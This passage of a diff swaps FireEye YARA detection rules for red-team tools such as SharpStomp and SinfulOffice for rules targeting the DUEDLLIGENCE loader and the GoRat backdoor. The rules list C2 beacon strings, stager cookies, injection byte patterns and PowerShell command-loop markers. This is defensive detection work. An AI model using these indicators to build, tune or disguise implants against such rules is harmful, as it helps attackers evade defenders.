-		$s1 = "function Invoke-Client()" ascii nocase wide
-		$s2 = "function Invoke-Server" ascii nocase wide
-		$s3 = "Read-Host 'Enter Command:'" ascii nocase wide
-		$s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide
-		$s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide
-		$s6 = " = iex $" ascii nocase wide
+		$1 = "DueDLLigence" fullword
+		$2 = "CPlApplet" fullword
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
+		id = "42e4e777-6d51-5733-97df-dc27f13a27b7"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe"
+		logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
 
 	strings:
-		$f0 = "mscoree.dll" fullword nocase
-		$s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A }
-		$s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 }
-		$s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 }
-		$s3 = "SetCreationTime" fullword
-		$s4 = "GetLastAccessTime" fullword
-		$s5 = "SetLastAccessTime" fullword
+		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 }
+		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE
+rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project."
 		author = "FireEye"
-		id = "e113c221-fabe-5af4-b763-463c4f86288d"
+		id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17"
+		hash = "a91bf61cc18705be2288a0f6f125068f"
+		logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide
+		$typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE
+
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
 		author = "FireEye"
-		id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
+		id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055"
+		date = "2021-03-03"
+		modified = "2021-03-03"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "83ed748cd94576700268d35666bf3e01"
-		logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e"
 		score = 75
-		quality = 71
+		quality = 25
 		tags = "FILE"
-		rev = 3
+		rev = 8
 
 	strings:
-		$s0 = "mscoree.dll" fullword nocase
-		$s1 = "timestompfile" fullword nocase
-		$s2 = "sharpstomp" fullword nocase
-		$s3 = "GetLastWriteTime" fullword
-		$s4 = "SetLastWriteTime" fullword
-		$s5 = "GetCreationTime" fullword
-		$s6 = "SetCreationTime" fullword
-		$s7 = "GetLastAccessTime" fullword
-		$s8 = "SetLastAccessTime" fullword
+		$mz = "MZ"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$mz at 0 and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
 }
-rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project."
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
 		author = "FireEye"
-		id = "80234352-a449-5292-9f0c-beb7a1d39a6c"
+		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
-		rev = 2
+		rev = 7
 
 	strings:
-		$typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build ID:" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
 }
-rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "69745e99-33cc-5171-ae7a-5c98439a0b6d"
-		date = "2020-12-09"
+		id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602"
+		hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f"
+		logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide
+		$1 = "comms.BeaconData" fullword
+		$2 = "comms.CommandResponse" fullword
+		$3 = "rat.BaseChannel" fullword
+		$4 = "rat.Config" fullword
+		$5 = "rat.Core" fullword
+		$6 = "platforms.AgentPlatform" fullword
+		$7 = "GetHostID" fullword
+		$8 = "/rat/cmd/gorat_shared/dllmain.go" fullword
 
 	condition:
-		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project."
+		description = "Identifies GoRat malware in memory based on strings."
 		author = "FireEye"
-		id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7"
+		id = "16fb1db7-711c-5d8d-9203-738c94f253fe"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8"
+		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
+		logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 75
+		tags = ""
 		rev = 1
 
 	strings:
-		$typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide
+		$murica = "murica" fullword
+		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat2 = "rat.(*Core).generateBeacon" fullword
+		$rat3 = "rat.gJitter" fullword
+		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
+		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
+		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
+		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
+		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
+		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
+		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
+		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$winblows or #murica > 10 or 3 of ( $rat* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE
+rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project."
 		author = "FireEye"
-		id = "f46fe365-ea50-5597-828e-61a7225e4c6e"
+		id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35"
+		logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide
+		$typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide
+		$typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project."
+		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
 		author = "FireEye"
-		id = "cf020fb3-751b-5346-8c0d-dc0a552599a3"
+		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77"
+		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
+		logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57"
 		score = 75
-		quality = 73
+		quality = 28
 		tags = "FILE"
-		rev = 1
+		rev = 5
 
 	strings:
-		$typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide
+		$dirty1 = "fireeye" ascii nocase wide
+		$dirty2 = "kulinacs" ascii nocase wide
+		$dirty3 = "RedFlare" ascii nocase wide
+		$dirty4 = "gorat" ascii nocase wide
+		$dirty5 = "flare" ascii nocase wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build ID:" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
 }
-rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE
+rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE
 {
 	meta:
-		description = "Looking for suspicious char encoding"
+		description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT"
 		author = "FireEye"
-		id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab"
+		id = "4646eadb-7acf-582f-9ad6-00f012ceed8a"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "41b70737fa8dda75d5e95c82699c2e9b"
-		logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324"
-		score = 65
+		hash = "68acf11f5e456744262ff31beae58526"
+		logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 3
 
 	strings:
-		$echo1 = "101;99;104;111;32;111;102;102;" ascii wide
-		$echo2 = "101:99:104:111:32:111:102:102:" ascii wide
-		$echo3 = "101x99x104x111x32x111x102x102x" ascii wide
-		$pe1 = "77;90;144;" ascii wide
-		$pe2 = "77:90:144:" ascii wide
-		$pe3 = "77x90x144x" ascii wide
-		$pk1 = "80;75;3;4;" ascii wide
-		$pk2 = "80:75:3:4:" ascii wide
-		$pk3 = "80x75x3x4x" ascii wide
+		$s1 = "SID1=%s" ascii wide
+		$s2 = "http/http.dylib" ascii wide
+		$s3 = "Mozilla/" ascii wide
+		$s4 = "User-Agent" ascii wide
+		$s5 = "Cookie" ascii wide
 
 	condition:
-		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 10MB and any of them
+		(( uint32( 0 ) == 0xBEBAFECA ) or ( uint32( 0 ) == 0xFEEDFACE ) or ( uint32( 0 ) == 0xFEEDFACF ) or ( uint32( 0 ) == 0xCEFAEDFE ) ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project."
+		description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)."
 		author = "FireEye"
-		id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1"
+		id = "5ac84cf1-49fb-533d-b211-b1a92239063b"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c"
+		hash = "66cdaa156e4d372cfa3dea0137850d20"
+		logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide
+		$s1 = "httpComms.dll" ascii wide
+		$s2 = "Cookie: SID1=%s" ascii wide
+		$s3 = "Global\\" ascii wide
+		$s4 = "stage0.dll" ascii wide
+		$s5 = "runCommand" ascii wide
+		$s6 = "getData" ascii wide
+		$s7 = "initialize" ascii wide
+		$s8 = "Windows NT %d.%d;" ascii wide
+		$s9 = "!This program cannot be run in DOS mode." ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE
+rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project."
 		author = "FireEye"
-		id = "616333fc-4075-5f04-823a-1164717a2b87"
-		date = "2020-12-10"
-		modified = "2020-12-10"
+		id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932"
+		date = "2020-12-09"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
